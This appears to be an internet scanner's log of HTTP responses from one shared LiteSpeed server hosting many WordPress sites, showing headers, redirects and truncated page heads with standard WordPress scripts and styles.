    date: Fri, 09 Jan 2026 21:55:00 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · heypmi.com

    2026-01-09 21:35

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://heypmi.com/wp-json/>; rel="https://api.w.org/"
    link: <https://heypmi.com/wp-json/wp/v2/pages/7>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://heypmi.com/>; rel=shortlink
    etag: "1136-1767994511;;;"
    x-litespeed-cache: miss
    content-length: 21608
    date: Fri, 09 Jan 2026 21:35:11 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Heyp Mi – Viral TikTok Meme
    
    <!DOCTYPE html>
    <html lang="en-US">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Heyp Mi &#8211; Viral TikTok Meme</title>
    <meta name='robots' content='max-image-preview:large' />
    	<style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>
    	<link rel='dns-prefetch' href='//fonts.googleapis.com' />
    <link rel="alternate" type="application/rss+xml" title="Heyp Mi &raquo; Feed" href="https://heypmi.com/feed/" />
    <link rel="alternate" type="application/rss+xml" title="Heyp Mi &raquo; Comments Feed" href="https://heypmi.com/comments/feed/" />
    <script>
    window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/16.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/16.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/heypmi.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.8.3"}};
    /*! This file is auto-generated */
    !function(s,n){var o,i,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),a=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===a[t]})}function u(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);for(var n=e.getImageData(16,16,1,1),a=0;a<n.data.length;a++)if(0!==n.data[a])return!1;return!0}function f(e,t,n,a){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!a(e,"\ud83e\udedf")}return!1}function g(e,t,n,a){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):s.createElement("canvas"),o=r.getContext("2d",{willReadFrequently:!0}),i=(o.textBaseline="top",o.font="600 32px Arial",{});return e.forEach(function(e){i[e]=t(o,e,n,a)}),i}function t(e){var t=s.createElement("script");t.src=e,t.defer=!0,s.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",i=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){s.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+g.toString()+"("+[JSON.stringify(i),f.toString(),p.toString(),u.toString()].join(",")+"));",a=new Blob([e],{type:"text/javascript"}),r=new Worker(URL.createObjectURL(a),{name:"wpTestEmojiSupports"});return void(r.onmessage=function(e){c(n=e.data),r.terminate(),t(n)})}catch(e){}c(n=g(i,f,p,u))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);
    </script>
    <link rel="preconnect" href="https://fonts.gstatic
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.nexuxtalentpartner.site

    2026-01-09 21:30

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    x-redirect-by: WordPress
    location: https://nexuxtalentpartner.site/
    x-litespeed-cache: hit
    content-length: 0
    date: Fri, 09 Jan 2026 21:30:06 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · webmoo.net

    2026-01-09 21:16

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    link: <https://webmoo.net/wp-json/>; rel="https://api.w.org/"
    link: <https://webmoo.net/wp-json/wp/v2/pages/77>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://webmoo.net/>; rel=shortlink
    etag: "1042-1767779000;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 09 Jan 2026 21:16:58 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · redarkgroup.com

    2026-01-09 21:14

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    link: <https://redarkgroup.com/wp-json/>; rel="https://api.w.org/"
    link: <https://redarkgroup.com/wp-json/wp/v2/pages/126>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://redarkgroup.com/>; rel=shortlink
    transfer-encoding: chunked
    date: Fri, 09 Jan 2026 21:14:08 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.platonika.study

    2026-01-09 20:19

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    set-cookie: pll_language=en; expires=Sat, 09-Jan-2027 20:19:47 GMT; Max-Age=31536000; path=/; secure; SameSite=Lax
    x-redirect-by: WordPress
    location: https://platonika.study/
    cache-control: public, max-age=0
    expires: Fri, 09 Jan 2026 20:19:48 GMT
    content-length: 0
    date: Fri, 09 Jan 2026 20:19:48 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.store.goyam.online

    2026-01-09 19:53

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://store.goyam.online/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 09 Jan 2026 19:53:36 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · lahorwaters.com

    2026-01-09 18:40

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://lahorwaters.com/wp-json/>; rel="https://api.w.org/"
    link: <https://lahorwaters.com/wp-json/wp/v2/pages/21574>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://lahorwaters.com/>; rel=shortlink
    etag: "850-1767788988;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 09 Jan 2026 18:40:55 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · cccapintel.com

    2026-01-09 18:37

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://cccapintel.com/wp-json/>; rel="https://api.w.org/"
    link: <https://cccapintel.com/wp-json/wp/v2/pages/16>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://cccapintel.com/>; rel=shortlink
    etag: "251-1767782203;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 09 Jan 2026 18:37:49 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.promosambevcr.devdecimosite2025.com

    2026-01-09 18:31

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://promosambevcr.devdecimosite2025.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 09 Jan 2026 18:31:45 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.lahorwaters.com

    2026-01-09 18:19

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://lahorwaters.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 09 Jan 2026 18:19:28 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · hmq.devdecimosite2025.com

    2026-01-09 18:16

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://hmq.devdecimosite2025.com/wp-json/>; rel="https://api.w.org/"
    link: <https://hmq.devdecimosite2025.com/wp-json/wp/v2/pages/7>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://hmq.devdecimosite2025.com/>; rel=shortlink
    etag: "1749-1767950846;;;"
    x-litespeed-cache: hit
    content-length: 166063
    date: Fri, 09 Jan 2026 18:16:36 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Home - HNOS MARÍN QUIROS
    
    <!DOCTYPE html>
    <html dir="ltr" lang="es-CR" prefix="og: https://ogp.me/ns#">
    
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Home - HNOS MARÍN QUIROS</title>
    
    		<!-- All in One SEO 4.9.2 - aioseo.com -->
    	<meta name="description" content="Tu navegador no soporta la reproducción de video. Inicio / Catálogo &gt; Filtros ₡9 600 TBK Super Diesel Coolant (50%) Promociones de la semana 00Días 00Horas 00Minutos 00Segundos Mercado Alternativo COD: - Switch de ventana eléctrica (universal) ₡2 500 Ver más detalle COD: - TBK Super Diesel Coolant (50%) ₡9 600 Ver más detalle HONDA" />
    	<meta name="robots" content="max-image-preview:large" />
    	<link rel="canonical" href="https://hmq.devdecimosite2025.com/" />
    	<meta name="generator" content="All in One SEO (AIOSEO) 4.9.2" />
    		<meta property="og:locale" content="es_ES" />
    		<meta property="og:site_name" content="HNOS MARÍN QUIROS -" />
    		<meta property="og:type" content="article" />
    		<meta property="og:title" content="Home - HNOS MARÍN QUIROS" />
    		<meta property="og:description" content="Tu navegador no soporta la reproducción de video. Inicio / Catálogo &gt; Filtros ₡9 600 TBK Super Diesel Coolant (50%) Promociones de la semana 00Días 00Horas 00Minutos 00Segundos Mercado Alternativo COD: - Switch de ventana eléctrica (universal) ₡2 500 Ver más detalle COD: - TBK Super Diesel Coolant (50%) ₡9 600 Ver más detalle HONDA" />
    		<meta property="og:url" content="https://hmq.devdecimosite2025.com/" />
    		<meta property="article:published_time" content="2025-08-27T10:32:13+00:00" />
    		<meta property="article:modified_time" content="2025-12-17T18:17:09+00:00" />
    		<meta name="twitter:card" content="summary_large_image" />
    		<meta name="twitter:title" content="Home - HNOS MARÍN QUIROS" />
    		<meta name="twitter:description" content="Tu navegador no soporta la reproducción de video. Inicio / Catálogo &gt; Filtros ₡9 600 TBK Super Diesel Coolant (50%) Promociones de la semana 00Días 00Horas 00Minutos 00Segundos Mercado Alternativo COD: - Switch de ventana eléctrica (universal) ₡2 500 Ver más detalle COD: - TBK Super Diesel Coolant (50%) ₡9 600 Ver más detalle HONDA" />
    		<script type="application/ld+json" class="aioseo-schema">
    			{"@context":"https:\/\/schema.org","@graph":[{"@type":"BreadcrumbList","@id":"https:\/\/hmq.devdecimosite2025.com\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/hmq.devdecimosite2025.com#listItem","position":1,"name":"Home"}]},{"@type":"Organization","@id":"https:\/\/hmq.devdecimosite2025.com\/#organization","name":"HNOS MAR\u00cdN QUIROS","url":"https:\/\/hmq.devdecimosite2025.com\/"},{"@type":"WebPage","@id":"https:\/\/hmq.devdecimosite2025.com\/#webpage","url":"https:\/\/hmq.devdecimosite2025.com\/","name":"Home - HNOS MAR\u00cdN QUIROS","description":"Tu navegador no soporta la reproducci\u00f3n de video. Inicio \/ Cat\u00e1logo > Filtros \u20a19 600 TBK Super Diesel Coolant (50%) Promociones de la semana 00D\u00edas 00Horas 00Minutos 00Segundos Mercado Alternativo COD: - Switch de ventana el\u00e9ctrica (universal) \u20a12 500 Ver m\u00e1s detalle COD: - TBK Super Diesel Coolant (50%) \u20a19 600 Ver m\u00e1s detalle HONDA","inLanguage":"es-CR","isPartOf":{"@id":"https:\/\/hmq.devdecimosite2025.com\/#website"},"breadcrumb":{"@id":"https:\/\/hmq.devdecimosite2025.com\/#breadcrumblist"},"datePublished":"2025-08-27T10:32:13+00:00","dateModified":"2025-12-17T18:17:09+00:00"},{"@type":"WebSite","@id":"https:\/\/hmq.devdecimosite2025.com\/#website","url":"https:\/\/hmq.devdecimosite2025.com\/","name":"HNOS MAR\u00cdN QUIROS","inLanguage":"es-CR","publisher":{"@id":"https:\/\/hmq.devdecimosite2025.com\/#organization"}}]}
    		</script>
    		<!-- All in One SEO -->
    
    <link rel="alternate" type="application/rss+xml" title="HNOS MARÍN QUIROS &raquo; Feed" href="https://hmq.devdecimosite2025.com/feed/" />
    <link rel="alternate" type="application/rss+xml" title="HNOS MARÍN QUIROS &raquo; RSS de los comentarios" href="https://hmq.devdecimosite202
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · dubaiforkliftrental.com

    2026-01-09 17:42

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://www.dubaiforkliftrental.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 09 Jan 2026 17:42:07 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.paraparappucheithi.com

    2026-01-09 17:30

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://paraparappucheithi.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 09 Jan 2026 17:30:50 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · platonika.study

    2026-01-09 16:59

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    cache-control: public
    expires: Fri, 09 Jan 2026 16:59:11 GMT
    content-type: text/html
    accept-ranges: bytes
    content-length: 326400
    date: Fri, 09 Jan 2026 16:59:11 GMT
    server: LiteSpeed
    x-speedycache-source: Server
    cache-tag: platonika.study
    cdn-cache-control: max-age=1296000
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Home - Platonika Learning
    
    <!DOCTYPE html>
    <html lang="en-CA">
    <head>
    <meta charset="UTF-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="pingback" href="https://platonika.study/xmlrpc.php"/>
    <title>Home - Platonika Learning</title><link rel="preload" as="image" href="http://platonika.study/wp-content/uploads/2024/09/logo-original.png" />
    <meta name='robots' content='index, max-snippet:-1, max-image-preview:large, max-video-preview:-1, follow'/>
    <link rel="alternate" href="https://platonika.study/" hreflang="en"/>
    <link rel="alternate" href="https://platonika.study/uk/" hreflang="uk"/>
    <link rel="alternate" href="https://platonika.study/ru/" hreflang="ru"/>
    <link rel="canonical" href="https://platonika.study/"/>
    <meta name="description" content=""><script type="application/ld+json">{"@context":"https://schema.org","@type":"Organization","@id":"https://platonika.study/#","name":"","url":"https://platonika.study","logo":{"@type":"ImageObject","@id":"https://platonika.study/#logo","inLanguage":"en-CA"},"description":"Platonika Learning","sameAs":["https://x.com/"]}</script><meta property="og:url" content="https://platonika.study/"/><meta property="og:site_name" content="Platonika Learning"/><meta property="og:locale" content="en_CA"/><meta property="og:type" content="website"/><meta property="og:title" content="Home - Platonika Learning"/><meta name="twitter:card" content="summary"/><meta name="twitter:locale" content="en_CA"/><meta name="twitter:title" content="Home - Platonika Learning"/><meta name="twitter:url" content="https://platonika.study/"/><link rel='dns-prefetch' href='//fonts.googleapis.com'/>
    <link rel="alternate" type="application/rss+xml" title="Platonika Learning &raquo; Feed" href="https://platonika.study/feed/"/>
    <link rel="alternate" type="application/rss+xml" title="Platonika Learning &raquo; Comments Feed" href="https://platonika.study/comments/feed/"/>
    <meta content="Divi v.4.27.4" name="generator"/><link rel="stylesheet" href="https://platonika.study/wp-content/cache/speedycache/platonika.study/assets/d32c85ed80eeadc0-d32c85ed80eeadc0-combined.css" />
    <style id='wp-block-library-theme-inline-css' type='text/css'>.wp-block-audio :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio :where(figcaption){color:#ffffffa6}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}:root :where(.wp-block-image figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme :root :where(.wp-block-image figcaption){color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote:where(.has-text-align-right){border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote:where(.has-text-align-center){border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote:where(.is-style-plain){border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-se
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · mirental.ca

    2026-01-09 16:26

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://mirental.ca/wp-json/>; rel="https://api.w.org/"
    link: <https://mirental.ca/wp-json/wp/v2/pages/95>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://mirental.ca/>; rel=shortlink
    etag: "413-1767389830;;;"
    x-litespeed-cache: hit
    content-length: 225167
    date: Fri, 09 Jan 2026 16:26:08 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: My Blog – My WordPress Blog
    
    <!DOCTYPE html>
    <html lang="en-US">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    	<link rel="profile" href="https://gmpg.org/xfn/11"> 
    	<title>My Blog &#8211; My WordPress Blog</title>
    <meta name='robots' content='max-image-preview:large' />
    	<style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>
    	<link rel='dns-prefetch' href='//fonts.googleapis.com' />
    <link rel="alternate" type="application/rss+xml" title="My Blog &raquo; Feed" href="https://mirental.ca/feed/" />
    <link rel="alternate" type="application/rss+xml" title="My Blog &raquo; Comments Feed" href="https://mirental.ca/comments/feed/" />
    <script>
    window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/mirental.ca\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
    /*! This file is auto-generated */
    !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);
    </script>
    
    <link rel='stylesheet' id='astra-theme-css-css' href='https://mirental.ca/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.11.1' media='
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · pahesn.org

    2026-01-09 16:07

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-pingback: https://pahesn.org/xmlrpc.php
    link: <https://pahesn.org/wp-json/>; rel="https://api.w.org/"
    link: <https://pahesn.org/wp-json/wp/v2/pages/315>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://pahesn.org/>; rel=shortlink
    etag: "139-1767384554;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 09 Jan 2026 16:07:34 GMT
    server: LiteSpeed
    referrer-policy: no-referrer-when-downgrade
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · flamecharismatic.org.uk

    2026-01-09 15:52

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://flamecharismatic.org.uk/wp-json/>; rel="https://api.w.org/"
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache, must-revalidate, max-age=0, no-store, private
    content-length: 5297
    date: Fri, 09 Jan 2026 15:52:16 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Site is undergoing maintenance
    
    <!DOCTYPE html>
    <html lang="en-US">
    <head>
    	<meta charset="UTF-8" />
    	<title>Site is undergoing maintenance</title>		<meta name="viewport" content="width=device-width, maximum-scale=1, initial-scale=1, minimum-scale=1">
    	<meta name="description" content=""/>
    	<meta http-equiv="X-UA-Compatible" content="" />
    	<meta property="og:site_name" content=" - "/>
    	<meta property="og:title" content="Site is undergoing maintenance"/>
    	<meta property="og:type" content="Maintenance"/>
    	<meta property="og:url" content="https://flamecharismatic.org.uk"/>
    	<meta property="og:description" content="Site will be available soon. Thank you for your patience!"/>
    		<link rel="profile" href="http://gmpg.org/xfn/11" />
    	<link rel="pingback" href="https://flamecharismatic.org.uk/xmlrpc.php" />
    	<link rel='stylesheet' id='mtnc-style-css' href='https://flamecharismatic.org.uk/wp-content/plugins/maintenance/load/css/style.css?ver=1753955520' media='all' />
    <link rel='stylesheet' id='mtnc-fonts-css' href='https://flamecharismatic.org.uk/wp-content/plugins/maintenance/load/css/fonts.css?ver=1566425282' media='all' />
    <style type="text/css">body {background-color: #111111}.preloader {background-color: #111111}body {font-family: Open Sans; }.site-title, .preloader i, .login-form, .login-form a.lost-pass, .btn-open-login-form, .site-content, .user-content-wrapper, .user-content, footer, .maintenance a{color: #ffffff;} a.close-user-content, #mailchimp-box form input[type="submit"], .login-form input#submit.button  {border-color:#ffffff} input[type="submit"]:hover{background-color:#ffffff} input:-webkit-autofill, input:-webkit-autofill:focus{-webkit-text-fill-color:#ffffff} body &gt; .login-form-container{background-color:#111111}.btn-open-login-form{background-color:#111111}input:-webkit-autofill, input:-webkit-autofill:focus{-webkit-box-shadow:0 0 0 50px #111111 inset}input[type='submit']:hover{color:#111111} #custom-subscribe #submit-subscribe:before{background-color:#111111} </style>    
        <!--[if IE]><script type="text/javascript" src="https://flamecharismatic.org.uk/wp-content/plugins/maintenance/load/js/jquery.backstretch.min.js"></script><![endif]--><link rel="stylesheet" href="https://fonts.bunny.net/css?family=Open%20Sans:300,300italic,regular,italic,600,600italic,700,700italic,800,800italic:300"></head>
    
    <body class="maintenance ">
    
    <div class="main-container">
    	<div class="preloader"><i class="fi-widget" aria-hidden="true"></i></div>	<div id="wrapper">
    		<div class="center logotype">
